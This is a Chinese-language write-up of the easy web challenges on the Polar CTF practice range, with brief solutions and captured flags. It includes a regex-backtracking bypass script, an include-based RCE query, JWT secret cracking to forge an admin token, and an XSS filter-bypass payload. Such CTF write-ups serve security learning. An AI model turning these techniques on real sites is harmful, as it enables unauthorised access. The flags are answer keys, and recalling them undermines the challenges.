【WEB】[Polar靶场] 简单 全部 题解

发布于:2025-07-25 ⋅ 阅读:(12) ⋅ 点赞:(0)

目录

@swp

@rce

@蜜雪冰城吉警店

@召唤神龙

 @seek flag

@jwt

@login

@iphone

 @浮生日记

 @$$


想要看详细解题过程的去看【WEB】[Polar靶场] 简单 详细笔记

@swp

访问/.index.php.swp

利用回溯限制用python发送post请求

import requests
url='http://f7587f00-8a64-4c49-ba2a-bfcd26f4738a.www.polarctf.com:8090/'
date={'xdmtql': 'sys nb'+'a'*1000000}
result=requests.post(url,data=date)
print(result.content)
flag{4560b3bfea9683b050c730cd72b3a099}

@rce

get请求   ?sys=include'/flag';
post请求  yyds=666

flag{j6856fd063f0a04874311187da1191h6}

@蜜雪冰城吉警店

更改前端代码,把一个数字改成9,然后点击更改后的奶茶

flag{7d43cc8863ad0ee649048e562fde53ec}

@召唤神龙

访问/main.js

发现这是jsfuck编码

直接解码CTF在线工具-在线JSfuck解密

flag{fdf9a88ec4fdd9e3dedaafeece5cc248}

 @seek flag

访问/robots.txt可以得到一部分

查看标头可以得到一部分

将cookie中的id改为1可以得到一部分

flag{7ac5b3ca8737a70f029dc0ad71dadd11}

以上5个题没看懂的看这个【WEB】[Polar靶场] 简单 1-5题 详细笔记 -CSDN博客


@jwt

随便注册一个账号,登录,查看cookie中的jwt

将jwt解码

jwt在线解密/加密 - JSON中文网

用jwtcrack工具爆破出密钥

输入密钥,把username改成admin,然后点击编码

用编码后的jwt替换原来的jwt

flag{ec39c705cfb5295f9dddcedc819a1659}

@login

从20200102开始,每次提交都会显示一个字符

flag{dlcg} 

@iphone

把User-Agent改成

Mozilla/5.0 (iPhone; CPU iPhone OS 16_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Mobile/15E148 Safari/604.1

 

flag{ba4c2f175f0dba2f2974e676c6dfbbab}

 @浮生日记

想办法弹个窗

"><sscriptcript>alert(1)</sscriptcript>
flag{747b11f075d2f6f0d599058206190e27}

 @$$

利用超全局变量GLOBALS

 

flag{9f8a2133f0cad361ff6d22a445c2531a}


 

 

持续更新中......


网站公告

今日签到

点亮在社区的每一天
去签到